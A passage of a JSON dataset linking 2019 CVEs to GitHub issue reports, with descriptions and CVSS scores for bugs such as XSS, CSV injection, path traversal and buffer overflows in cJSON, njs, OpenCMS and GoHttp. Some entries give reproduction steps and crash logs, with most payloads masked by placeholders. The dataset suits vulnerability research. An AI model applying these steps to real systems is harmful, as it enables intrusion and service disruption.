  34809. "description": "Variable APITAG permissions don't comply with project scoping. Prerequisites [x] We are ready to publicly disclose this vulnerability or exploit according to our [responsible disclosure process URLTAG . FILETAG NUMBERTAG Create another unrelated project (eg Foo NUMBERTAG Configure a separate user that has the following permissions The APITAG Contributor\" role scoped to FILETAG You can only view the one variable in APITAG FILETAG In NUMBERTAG failing) With this permissions setup FILETAG You can view all unscoped variables in APITAG FILETAG Details These affected permissions are not used by an built in roles in Octopus. If you are using built in roles only, then you will not be affected. Affected versions of Octopus Server APITAG APITAG (inclusive), and APITAG APITAG (inclusive) Workarounds There is no known way of preserving the same access control that existed before this regression was introduced. Until an upgrade can be performed to a version of Octopus Server where this bug has been fixed, It is recommended that the ERRORTAG and ERRORTAG permissions are revoked where possible and only highly privileged users (eg. admins or space managers) are granted these permissions.",
  34810. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N",
  34811. "severity": "HIGH",
  34812. "baseScore": 8.1,
  34813. "impactScore": 5.2,
  34814. "exploitabilityScore": 2.8
  34815. },
  34816. {
  34817. "CVE_ID": "CVE-2019-11633",
  34818. "Issue_Url_old": "https://github.com/dustyfresh/HoneyPress/issues/1",
  34819. "Issue_Url_new": "https://github.com/dustyfresh/honeypress/issues/1",
  34820. "Repo_new": "dustyfresh/HoneyPress",
  34821. "Issue_Created_At": "2019-05-01T09:36:36Z",
  34822. "description": "Fingerprinting. Honeypress can be fingerprinted by attackers because of the ingrained unique hostnames within the APITAG templates. \" FILETAG \" \" FILETAG \"",
  34823. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
  34824. "severity": "HIGH",
  34825. "baseScore": 7.5,
  34826. "impactScore": 3.6,
  34827. "exploitabilityScore": 3.9
  34828. },
  34829. {
  34830. "CVE_ID": "CVE-2019-11636",
  34831. "Issue_Url_old": "https://github.com/zcash/zcash/issues/3955",
  34832. "Issue_Url_new": "https://github.com/zcash/zcash/issues/3955",
  34833. "Repo_new": "zcash/zcash",
  34834. "Issue_Created_At": "2019-04-16T22:38:26Z",
  34835. "description": "Denial of Service. Scaling discussions don\u2019t make sense unless the ultimately goal is to reduce the likelihood that users will not be able to use Zcash because of a lack of service. There are lots of ways to fill up our service currently. When we spot them, we should link them to this epic. A small number of shielded transaction of massive size. A small number of or many transactions with many empty outputs. Many small transactions filling the mempool currently crash the nodes that receive them. It\u2019s possible to knock nodes offline Transaction expiry helps reduce the cost for an attacker. Additionally, the failure mode is currently catastrophic. Filling the mempool currently results in a node crash. With such an attack, someone might be able to knock over mining pool operators, and thus significantly drop the hashpower of the network, facilitating a NUMBERTAG attack. Suggested course of action: Set limits on the mempool size, and reject further transactions Other steps that result in the reduction of the likelihood of a successful APITAG attack",
  34836. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  34837. "severity": "HIGH",
  34838. "baseScore": 7.5,
  34839. "impactScore": 3.6,
  34840. "exploitabilityScore": 3.9
  34841. },
  34842. {
  34843. "CVE_ID": "CVE-2019-11641",
  34844. "Issue_Url_old": "https://github.com/threatstream/agave/issues/1",
  34845. "Issue_Url_new": "https://github.com/pwnlandia/agave/issues/1",
  34846. "Repo_new": "pwnlandia/agave",
  34847. "Issue_Created_At": "2019-05-01T11:18:28Z",
  34848. "description": "Fingerprinting. Agave fails to avoid fingerprinting by including its own name within HTML templates.",
  34849. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
  34850. "severity": "HIGH",
  34851. "baseScore": 7.5,
  34852. "impactScore": 3.6,
  34853. "exploitabilityScore": 3.9
  34854. },
  34855. {
  34856. "CVE_ID": "CVE-2019-11770",
  34857. "Issue_Url_old": "https://github.com/eclipse/buildship/issues/855",
  34858. "Issue_Url_new": "https://github.com/eclipse/buildship/issues/855",
  34859. "Repo_new": "eclipse/buildship",
  34860. "Issue_Created_At": "2019-02-18T21:04:48Z",
  34861. "description": "FILETAG The build files indicate that this project is resolving dependencies over HTTP instead of HTTPS. Any of these artifacts could have been MITM to maliciously compromise them and infect the build artifacts that were produced. Additionally, if any of these JARs or other dependencies were compromised, any developers using these could continue to be infected past updating to fix this. This vulnerability has a CVSS NUMBERTAG Base Score of NUMBERTAG URLTAG This isn't just theoretical POC code exists already to maliciously compromise a JAR file inflight. See: URLTAG URLTAG MITM Attacks Increasingly Common: See: URLTAG URLTAG Source Locations: Download of Eclipse SDK: URLTAG URLTAG Eclipse SDK has no checksum verification: URLTAG Download of Gradle: URLTAG",
  34862. "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H",
  34863. "severity": "HIGH",
  34864. "baseScore": 8.1,
  34865. "impactScore": 5.9,
  34866. "exploitabilityScore": 2.2
  34867. },
  34868. {
  34869. "CVE_ID": "CVE-2019-11808",
  34870. "Issue_Url_old": "https://github.com/ratpack/ratpack/issues/1448",
  34871. "Issue_Url_new": "https://github.com/ratpack/ratpack/issues/1448",
  34872. "Repo_new": "ratpack/ratpack",
  34873. "Issue_Created_At": "2019-04-23T01:51:49Z",
  34874. "description": "Use UUID directly for generating session IDs.",
  34875. "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N",
  34876. "severity": "LOW",
  34877. "baseScore": 3.7,
  34878. "impactScore": 1.4,
  34879. "exploitabilityScore": 2.2
  34880. },
  34881. {
  34882. "CVE_ID": "CVE-2019-11818",
  34883. "Issue_Url_old": "https://github.com/alkacon/opencms-core/issues/635",
  34884. "Issue_Url_new": "https://github.com/alkacon/opencms-core/issues/635",
  34885. "Repo_new": "alkacon/opencms-core",
  34886. "Issue_Created_At": "2019-04-08T08:22:14Z",
  34887. "description": "Cross Site Scripting NUMBERTAG New User. Hello Team, I would like to report a vulnerability (cross site scripting) which I have observed in current version NUMBERTAG and before. Cross Site Scripting (XSS) allows attacker to inject the malicious APITAG as user input and then malicious script can access any cookies, session tokens, or other sensitive information associated with impacted applications. Please refer URLTAG for more details. Impacted URL is FILETAG Steps to reproduce NUMBERTAG Browse to Quick Launch > Account Management > User Management > New User NUMBERTAG Insert APITAG in First Name and Last Name field. APITAG NUMBERTAG Inserted APITAG payload will be executed on all pages where user information is displayed such as user confirmation, user list, user view etc. APITAG Version details: APITAG Best Regards URLTAG varchashva [at] gmail [dot] com",
  34888. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  34889. "severity": "MEDIUM",
  34890. "baseScore": 6.1,
  34891. "impactScore": 2.7,
  34892. "exploitabilityScore": 2.8
  34893. },
  34894. {
  34895. "CVE_ID": "CVE-2019-11819",
  34896. "Issue_Url_old": "https://github.com/alkacon/opencms-core/issues/636",
  34897. "Issue_Url_new": "https://github.com/alkacon/opencms-core/issues/636",
  34898. "Repo_new": "alkacon/opencms-core",
  34899. "Issue_Created_At": "2019-04-08T10:36:24Z",
  34900. "description": "CSV Injection NUMBERTAG New User. Hello Team, I would like to report a vulnerability (CSV Injection) which I have observed in current version NUMBERTAG and before. When a spreadsheet program such as Microsoft Excel or APITAG Calc is used to open a CSV, any cells starting with '=' will be interpreted by the software as a formula. Maliciously crafted formulas can be used for three key attacks: Hijacking the user's computer by exploiting vulnerabilities in the spreadsheet software, such as CVETAG Hijacking the user's computer by exploiting the user's tendency to ignore security warnings in spreadsheets that they downloaded from their own website Exfiltrating contents from the spreadsheet, or other open spreadsheets. Please refer URLTAG for more details. Impacted URL is FILETAG Steps to reproduce NUMBERTAG Browse to Quick Launch > Account Management > User Management > New User Insert APITAG in First Name and Last Name field APITAG NUMBERTAG Now export all user information in CSV by using export feature in application. Quick Launch > Account Management > User Management > Export User NUMBERTAG Once user opens the affected CSV file, payload will be triggered APITAG APITAG Version Details: APITAG Best Regards URLTAG varchashva [at] gmail [dot] com",
  34901. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  34902. "severity": "HIGH",
  34903. "baseScore": 7.8,
  34904. "impactScore": 5.9,
  34905. "exploitabilityScore": 1.8
  34906. },
  34907. {
  34908. "CVE_ID": "CVE-2019-11834",
  34909. "Issue_Url_old": "https://github.com/DaveGamble/cJSON/issues/337",
  34910. "Issue_Url_new": "https://github.com/davegamble/cjson/issues/337",
  34911. "Repo_new": "davegamble/cjson",
  34912. "Issue_Created_At": "2019-02-21T03:29:14Z",
  34913. "description": "APITAG cross border read&write NUMBERTAG FILETAG NUMBERTAG can bypass NUMBERTAG bug can be trigger with json string buffer that end with NUMBERTAG or not ERRORTAG test demo, compile at ubuntu NUMBERTAG cause stackoverflow\uff1a ERRORTAG",
  34914. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  34915. "severity": "CRITICAL",
  34916. "baseScore": 9.8,
  34917. "impactScore": 5.9,
  34918. "exploitabilityScore": 3.9
  34919. },
  34920. {
  34921. "CVE_ID": "CVE-2019-11835",
  34922. "Issue_Url_old": "https://github.com/DaveGamble/cJSON/issues/338",
  34923. "Issue_Url_new": "https://github.com/davegamble/cjson/issues/338",
  34924. "Repo_new": "davegamble/cjson",
  34925. "Issue_Created_At": "2019-02-21T03:56:18Z",
  34926. "description": "APITAG cross border read&write NUMBERTAG FILETAG NUMBERTAG this bug can delete NUMBERTAG cross border read&write, and if use str API result will fault, cause some logical problem, such as stack&heapoverflow, leak info etc.. CODETAG this should be code as below: CODETAG just leak stack data for test server.c CODETAG client iP: APITAG prot NUMBERTAG recv bufdata = / abcdefghjklmn After APITAG bufdata: APITAG `",
  34927. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  34928. "severity": "CRITICAL",
  34929. "baseScore": 9.8,
  34930. "impactScore": 5.9,
  34931. "exploitabilityScore": 3.9
  34932. },
  34933. {
  34934. "CVE_ID": "CVE-2019-11837",
  34935. "Issue_Url_old": "https://github.com/nginx/njs/issues/155",
  34936. "Issue_Url_new": "https://github.com/nginx/njs/issues/155",
  34937. "Repo_new": "nginx/njs",
  34938. "Issue_Created_At": "2019-05-07T18:38:36Z",
  34939. "description": "Segfault in APITAG for negative arguments.. ERRORTAG",
  34940. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  34941. "severity": "HIGH",
  34942. "baseScore": 7.5,
  34943. "impactScore": 3.6,
  34944. "exploitabilityScore": 3.9
  34945. },
  34946. {
  34947. "CVE_ID": "CVE-2019-11838",
  34948. "Issue_Url_old": "https://github.com/nginx/njs/issues/153",
  34949. "Issue_Url_new": "https://github.com/nginx/njs/issues/153",
  34950. "Repo_new": "nginx/njs",
  34951. "Issue_Created_At": "2019-05-07T17:43:35Z",
  34952. "description": "heap buffer overflow in APITAG APITAG ERRORTAG Probably is the same as NUMBERTAG array struct corruption while resizing). Minified test from fluff URLTAG report.",
  34953. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  34954. "severity": "CRITICAL",
  34955. "baseScore": 9.8,
  34956. "impactScore": 5.9,
  34957. "exploitabilityScore": 3.9
  34958. },
  34959. {
  34960. "CVE_ID": "CVE-2019-11839",
  34961. "Issue_Url_old": "https://github.com/nginx/njs/issues/152",
  34962. "Issue_Url_new": "https://github.com/nginx/njs/issues/152",
  34963. "Repo_new": "nginx/njs",
  34964. "Issue_Created_At": "2019-05-07T17:30:56Z",
  34965. "description": "heap buffer overflow in APITAG APITAG ERRORTAG Minified test from fluff URLTAG report.",
  34966. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  34967. "severity": "CRITICAL",
  34968. "baseScore": 9.8,
  34969. "impactScore": 5.9,
  34970. "exploitabilityScore": 3.9
  34971. },
  34972. {
  34973. "CVE_ID": "CVE-2019-11840",
  34974. "Issue_Url_old": "https://github.com/golang/go/issues/30965",
  34975. "Issue_Url_new": "https://github.com/golang/go/issues/30965",
  34976. "Repo_new": "golang/go",
  34977. "Issue_Created_At": "2019-03-20T22:32:56Z",
  34978. "description": "PATHTAG keystream loop in amd NUMBERTAG implementation after APITAG If more than NUMBERTAG APITAG of keystream is generated, or if the counter otherwise grows greater than NUMBERTAG bits, the amd NUMBERTAG implementation will first generate incorrect output, and then cycle back to previously generated keystream. Repeated keystream bytes can lead to loss of confidentiality in encryption applications, or to predictability in CSPRNG applications. The issue might affect uses of PATHTAG with extremely large messages. Architectures other than amd NUMBERTAG and uses that generate less than NUMBERTAG APITAG of keystream for a single APITAG invocation are unaffected. This issue was discovered and reported by Michael APITAG",
  34979. "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N",
  34980. "severity": "MEDIUM",
  34981. "baseScore": 5.9,
  34982. "impactScore": 3.6,
  34983. "exploitabilityScore": 2.2
  34984. },
  34985. {
  34986. "CVE_ID": "CVE-2019-11870",
  34987. "Issue_Url_old": "https://github.com/s9y/Serendipity/issues/598",
  34988. "Issue_Url_new": "https://github.com/s9y/serendipity/issues/598",
  34989. "Repo_new": "s9y/serendipity",
  34990. "Issue_Created_At": "2019-03-07T14:35:55Z",
  34991. "description": "XSS via exiftag. The attached file contains an XSS payload as the camera model EXIF tag. Uploading it to s9y and looking at the details of the file will execute. The exif tag printing should be escaped. APITAG this is only self xss, there are situations where this could still be exploited, imagine someone sending a photo to someone else for a blogpost.) FILETAG",
  34992. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  34993. "severity": "MEDIUM",
  34994. "baseScore": 6.1,
  34995. "impactScore": 2.7,
  34996. "exploitabilityScore": 2.8
  34997. },
  34998. {
  34999. "CVE_ID": "CVE-2019-11881",
  35000. "Issue_Url_old": "https://github.com/rancher/rancher/issues/20216",
  35001. "Issue_Url_new": "https://github.com/rancher/rancher/issues/20216",
  35002. "Repo_new": "rancher/rancher",
  35003. "Issue_Created_At": "2019-05-13T23:21:30Z",
  35004. "description": "Web Parameter Tampering on APITAG APITAG What kind of request is this ( PATHTAG request): Enhancement Steps to reproduce (least amount of steps as possible): Access the following endpoint on any Rancher instance up to NUMBERTAG URLTAG APITAG Result: It will display a link to OWASP Wiki explaining Web Parameter Tampering. Other details that may be helpful: Tags are effectively filtered. Environment information Rancher version ( APITAG / APITAG image tag or shown bottom left in the UI NUMBERTAG Installation option (single install/HA): APITAG Cluster information Cluster type APITAG PATHTAG ): Machine type ( PATHTAG ) and specifications (CPU/memory): Kubernetes version (use kubectl version ): APITAG Docker version (use docker version ): APITAG",
  35005. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:N/I:L/A:N",
  35006. "severity": "MEDIUM",
  35007. "baseScore": 4.7,
  35008. "impactScore": 1.4,
  35009. "exploitabilityScore": 2.8
  35010. },
  35011. {
  35012. "CVE_ID": "CVE-2019-12041",
  35013. "Issue_Url_old": "https://github.com/jonschlinkert/remarkable/issues/331",
  35014. "Issue_Url_new": "https://github.com/jonschlinkert/remarkable/issues/331",
  35015. "Repo_new": "jonschlinkert/remarkable",
  35016. "Issue_Created_At": "2019-05-13T10:39:02Z",
  35017. "description": "APITAG Regex APITAG vulnerability in parsing html tag. If you guys are not familiar with this type of bug, here is the detail explanation: URLTAG Vulnerable line of code: URLTAG APITAG CODETAG This will hang forever due to the regex matching of CDATA tag.",
  35018. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  35019. "severity": "HIGH",
  35020. "baseScore": 7.5,
  35021. "impactScore": 3.6,
  35022. "exploitabilityScore": 3.9
  35023. },
  35024. {
  35025. "CVE_ID": "CVE-2019-12043",
  35026. "Issue_Url_old": "https://github.com/jonschlinkert/remarkable/issues/332",
  35027. "Issue_Url_new": "https://github.com/jonschlinkert/remarkable/issues/332",
  35028. "Repo_new": "jonschlinkert/remarkable",
  35029. "Issue_Created_At": "2019-05-13T12:15:57Z",
  35030. "description": "APITAG bad url bypass, could lead to XSS. Hi, check out this reported issue URLTAG Im able to bypass the bad url check, implemented here URLTAG CODETAG It will generate output like this APITAG Which could pop up an alert when user clicks into it. Fix: maybe we can strip unprintable character around the url scheme?",
  35031. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  35032. "severity": "MEDIUM",
  35033. "baseScore": 6.1,
  35034. "impactScore": 2.7,
  35035. "exploitabilityScore": 2.8
  35036. },
  35037. {
  35038. "CVE_ID": "CVE-2019-12047",
  35039. "Issue_Url_old": "https://github.com/getgridea/gridea/issues/105",
  35040. "Issue_Url_new": "https://github.com/getgridea/gridea/issues/105",
  35041. "Repo_new": "getgridea/gridea",
  35042. "Issue_Created_At": "2019-05-13T05:48:39Z",
  35043. "description": "Vulnerability: XSS to RCE. Hi, I found an XSS vulnerability that can cause RCE. And I recorded a GIF URLTAG to demonstrate controlling the local win NUMBERTAG through this vulnerability. Cause of vulnerability The post content editing area does not filter or prevent the running of js script, resulting in the use of XSS to call Nodejs module ( for example: APITAG ) to achieve arbitrary code execution. If the user imports content containing malicious code, the vulnerability will be triggered. Payload ERRORTAG",
  35044. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  35045. "severity": "MEDIUM",
  35046. "baseScore": 6.1,
  35047. "impactScore": 2.7,
  35048. "exploitabilityScore": 2.8
  35049. },
  35050. {
  35051. "CVE_ID": "CVE-2019-12086",
  35052. "Issue_Url_old": "https://github.com/FasterXML/jackson-databind/issues/2326",
  35053. "Issue_Url_new": "https://github.com/fasterxml/jackson-databind/issues/2326",
  35054. "Repo_new": "fasterxml/jackson-databind",
  35055. "Issue_Created_At": "2019-05-11T17:31:34Z",
  35056. "description": "Possible new CVE wrt Polymorphic typing (placeholder). A new potential CVE via Polymorphic Typing has been reported: this issue is a placeholder until CVE assigned, problem evaluated. Affects all versions released up to and including NUMBERTAG",
  35057. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
  35058. "severity": "HIGH",
  35059. "baseScore": 7.5,
  35060. "impactScore": 3.6,
  35061. "exploitabilityScore": 3.9
  35062. },
  35063. {
  35064. "CVE_ID": "CVE-2019-12101",
  35065. "Issue_Url_old": "https://github.com/darconeous/libnyoci/issues/21",
  35066. "Issue_Url_new": "https://github.com/darconeous/libnyoci/issues/21",
  35067. "Repo_new": "darconeous/libnyoci",
  35068. "Issue_Created_At": "2019-05-14T15:18:38Z",
  35069. "description": "There is a logical defect that causes a denial of service vulnerability. PATHTAG lines NUMBERTAG len = ( buffer NUMBERTAG F); switch(( buffer NUMBERTAG default: if(key) key += ( buffer NUMBERTAG buffer NUMBERTAG break; case NUMBERTAG buffer NUMBERTAG if(key) key NUMBERTAG buffer; buffer NUMBERTAG break; case NUMBERTAG buffer NUMBERTAG if(key) key NUMBERTAG buffer FILETAG Then the function coap_decode_option will set the length parameter to NUMBERTAG and the value_len in the function nyoci_inbound_option_strequal in PATHTAG is NUMBERTAG lines NUMBERTAG CODETAG If value_len is NUMBERTAG the subsequent loop is not executed (line NUMBERTAG and if the second argument cstr is an empty string, the return value is true (normal logic will return false in the loop) The function APITAG in PATHTAG for handling requests calls APITAG , and the second argument passed in is an empty string(lines NUMBERTAG CODETAG Therefore, the special data packet will pass the judgment, the program will enter the assignment to the variable prefix (the variable prefix is \u200b\u200bempty at this time), and the program eventually crashes. APITAG",
  35070. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  35071. "severity": "HIGH",
  35072. "baseScore": 7.5,
  35073. "impactScore": 3.6,
  35074. "exploitabilityScore": 3.9
  35075. },
  35076. {
  35077. "CVE_ID": "CVE-2019-12105",
  35078. "Issue_Url_old": "https://github.com/Supervisor/supervisor/issues/1245",
  35079. "Issue_Url_new": "https://github.com/supervisor/supervisor/issues/1245",
  35080. "Repo_new": "supervisor/supervisor",
  35081. "Issue_Created_At": "2019-05-29T14:01:52Z",
  35082. "description": "[ CVETAG ] Unauthenticated user can read log files or restart a service. Luan Souza (luansouza. EMAILTAG ) wrote in email: > So, I was search for vulnerabites in my work company and I founded supervisord, it's a good service but the user don't need authetication for view logs ou restart a service, this is a called a misconfiguration, because some people put this online and anyone can acess, and view logs e restart services therefore I submmit to a CVE, they requered to contact the developer to see if will fix the bug and howmuch time is required needed to do. > > Best regards, > ERRORTAG",
  35083. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:H",
  35084. "severity": "HIGH",
  35085. "baseScore": 8.2,
  35086. "impactScore": 4.2,
  35087. "exploitabilityScore": 3.9
  35088. },
  35089. {
  35090. "CVE_ID": "CVE-2019-12136",
  35091. "Issue_Url_old": "https://github.com/BoostIO/Boostnote/issues/3007",
  35092. "Issue_Url_new": "https://github.com/boostio/boostnote-legacy/issues/3007",
  35093. "Repo_new": "boostio/boostnote-legacy",
  35094. "Issue_Created_At": "2019-05-14T03:56:09Z",
  35095. "description": "A xss on the newest version. XSS There is a xss in the newest version via a label named mermaid When we insert codes like this: APITAG we can see there is a xss in the latest version. FILETAG",
  35096. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  35097. "severity": "MEDIUM",
  35098. "baseScore": 5.4,
  35099. "impactScore": 2.7,
  35100. "exploitabilityScore": 2.3
  35101. },
  35102. {
  35103. "CVE_ID": "CVE-2019-12137",
  35104. "Issue_Url_old": "https://github.com/typora/typora-issues/issues/2505",
  35105. "Issue_Url_new": "https://github.com/typora/typora-issues/issues/2505",
  35106. "Repo_new": "typora/typora-issues",
  35107. "Issue_Created_At": "2019-05-16T09:20:24Z",
  35108. "description": "Code Execution in Typora. Summary A local file path traversal issue exists in Typora version NUMBERTAG for APITAG which allows an attacker to execute arbitrary programs. Technical observation A crafted URI can be used in a note to perform this attack using PATHTAG as an argument or by traversing to any directory like ( PATHTAG ) Video APITAG FILETAG",
  35109. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  35110. "severity": "HIGH",
  35111. "baseScore": 7.8,
  35112. "impactScore": 5.9,
  35113. "exploitabilityScore": 1.8
  35114. },
  35115. {
  35116. "CVE_ID": "CVE-2019-12138",
  35117. "Issue_Url_old": "https://github.com/MacDownApp/macdown/issues/1076",
  35118. "Issue_Url_new": "https://github.com/macdownapp/macdown/issues/1076",
  35119. "Repo_new": "macdownapp/macdown",
  35120. "Issue_Created_At": "2019-05-16T09:58:31Z",
  35121. "description": "Code Execution in Macdown. Summary A local file path traversal issue exists in Macdown version NUMBERTAG for APITAG which allows an attacker to execute arbitrary programs. Technical observation A crafted URI can be used in a note to perform this attack using PATHTAG as an argument or by traversing to any directory like ( PATHTAG ) Video APITAG FILETAG",
  35122. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
  35123. "severity": "HIGH",
  35124. "baseScore": 7.8,
  35125. "impactScore": 5.9,
  35126. "exploitabilityScore": 1.8
  35127. },
  35128. {
  35129. "CVE_ID": "CVE-2019-12158",
  35130. "Issue_Url_old": "https://github.com/fekberg/GoHttp/issues/17",
  35131. "Issue_Url_new": "https://github.com/fekberg/gohttp/issues/17",
  35132. "Repo_new": "fekberg/gohttp",
  35133. "Issue_Created_At": "2019-05-17T06:16:24Z",
  35134. "description": "Heap Buffer Overflow when appending certain size string to URL file extension when compiled with ASAN.. Screen S Server APITAG CTRL A, D Screen S Crash curl APITAG CTRL A, D ASAN Details NUMBERTAG ERROR: APITAG heap buffer overflow on address NUMBERTAG efbb at pc NUMBERTAG e NUMBERTAG bp NUMBERTAG ffd9e6f3a NUMBERTAG sp NUMBERTAG ffd9e6f3a NUMBERTAG WRITE of size NUMBERTAG at NUMBERTAG efbb thread T NUMBERTAG e NUMBERTAG in APITAG ( PATHTAG NUMBERTAG f in APITAG ( PATHTAG NUMBERTAG b7 in receive ( PATHTAG NUMBERTAG da in handle ( PATHTAG NUMBERTAG in APITAG ( PATHTAG NUMBERTAG db in start ( PATHTAG NUMBERTAG ERRORTAG NUMBERTAG d in main ( PATHTAG ERRORTAG NUMBERTAG d NUMBERTAG f NUMBERTAG a NUMBERTAG f in __libc_start_main ( PATHTAG NUMBERTAG in _start ( PATHTAG NUMBERTAG efbb is located NUMBERTAG bytes to the right of NUMBERTAG byte region APITAG allocated by thread T0 here NUMBERTAG f NUMBERTAG a NUMBERTAG in malloc ( PATHTAG NUMBERTAG f2c in APITAG ( PATHTAG NUMBERTAG b7 in receive ( PATHTAG NUMBERTAG da in handle ( PATHTAG NUMBERTAG in APITAG ( PATHTAG NUMBERTAG db in start ( PATHTAG NUMBERTAG ERRORTAG NUMBERTAG d in main ( PATHTAG ERRORTAG NUMBERTAG d NUMBERTAG f NUMBERTAG a NUMBERTAG f in __libc_start_main ( PATHTAG ) SUMMARY: APITAG heap buffer overflow NUMBERTAG APITAG Shadow bytes around the buggy address NUMBERTAG c NUMBERTAG fff9da0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c NUMBERTAG fff9db0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c NUMBERTAG fff9dc0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c NUMBERTAG fff9dd0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c NUMBERTAG fff9de0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c NUMBERTAG fff9df0: fa fa fa fa fa fa NUMBERTAG fa fa NUMBERTAG fa fa fa NUMBERTAG c NUMBERTAG fff9e NUMBERTAG fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c NUMBERTAG fff9e NUMBERTAG fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c NUMBERTAG fff9e NUMBERTAG fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c NUMBERTAG fff9e NUMBERTAG fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c NUMBERTAG fff9e NUMBERTAG fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa Shadow byte legend (one shadow byte represents NUMBERTAG application bytes): Addressable NUMBERTAG Partially addressable NUMBERTAG Heap left redzone: fa Heap right redzone: fb Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack partial redzone: f4 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb APITAG internal: fe NUMBERTAG ABORTING",
  35135. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  35136. "severity": "CRITICAL",
  35137. "baseScore": 9.8,
  35138. "impactScore": 5.9,
  35139. "exploitabilityScore": 3.9
  35140. },
  35141. {
  35142. "CVE_ID": "CVE-2019-12159",
  35143. "Issue_Url_old": "https://github.com/fekberg/GoHttp/issues/16",
  35144. "Issue_Url_new": "https://github.com/fekberg/gohttp/issues/16",
  35145. "Repo_new": "fekberg/gohttp",
  35146. "Issue_Created_At": "2019-05-17T06:11:38Z",
  35147. "description": "Stack Buffer Overflow when requesting excessively long URL when compiled with ASAN.. Screen S Server APITAG CTRL A, D Screen S Crash python c \"print 'A NUMBERTAG file curl APITAG file) CTRL A, D Screen R Server NUMBERTAG ERROR: APITAG stack buffer overflow on address NUMBERTAG ffcea NUMBERTAG b NUMBERTAG at pc NUMBERTAG fcfe NUMBERTAG b bp NUMBERTAG ffcea NUMBERTAG sp NUMBERTAG ffcea NUMBERTAG ff8 READ of size NUMBERTAG at NUMBERTAG ffcea NUMBERTAG b NUMBERTAG thread T NUMBERTAG fcfe NUMBERTAG a in __interceptor_strlen ( PATHTAG NUMBERTAG c1 in scan ( PATHTAG NUMBERTAG c5 in APITAG ( PATHTAG NUMBERTAG in receive ( PATHTAG NUMBERTAG da in handle ( PATHTAG NUMBERTAG in APITAG ( PATHTAG NUMBERTAG db in start ( PATHTAG NUMBERTAG ERRORTAG NUMBERTAG d in main ( PATHTAG ERRORTAG NUMBERTAG d NUMBERTAG fcfe NUMBERTAG d NUMBERTAG f in __libc_start_main ( PATHTAG NUMBERTAG in _start ( PATHTAG ) Address NUMBERTAG ffcea NUMBERTAG b NUMBERTAG is located in stack of thread T0 at offset NUMBERTAG in frame NUMBERTAG a0 in receive ( PATHTAG ) This frame has NUMBERTAG object(s NUMBERTAG buffer' APITAG NUMBERTAG d4a NUMBERTAG f3]f3 f3 f3 f3 f3 f3 f NUMBERTAG d4a NUMBERTAG d4a NUMBERTAG d4a NUMBERTAG d4a NUMBERTAG a NUMBERTAG d4a NUMBERTAG b NUMBERTAG Shadow byte legend (one shadow byte represents NUMBERTAG application bytes): Addressable NUMBERTAG Partially addressable NUMBERTAG Heap left redzone: fa Heap right redzone: fb Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack partial redzone: f4 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb APITAG internal: fe NUMBERTAG ABORTING",
  35148. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  35149. "severity": "HIGH",
  35150. "baseScore": 7.5,
  35151. "impactScore": 3.6,
